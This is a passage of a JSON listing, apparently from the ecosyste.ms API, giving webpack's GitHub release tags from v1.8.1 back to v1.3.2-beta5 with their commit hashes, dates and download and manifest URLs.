ags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2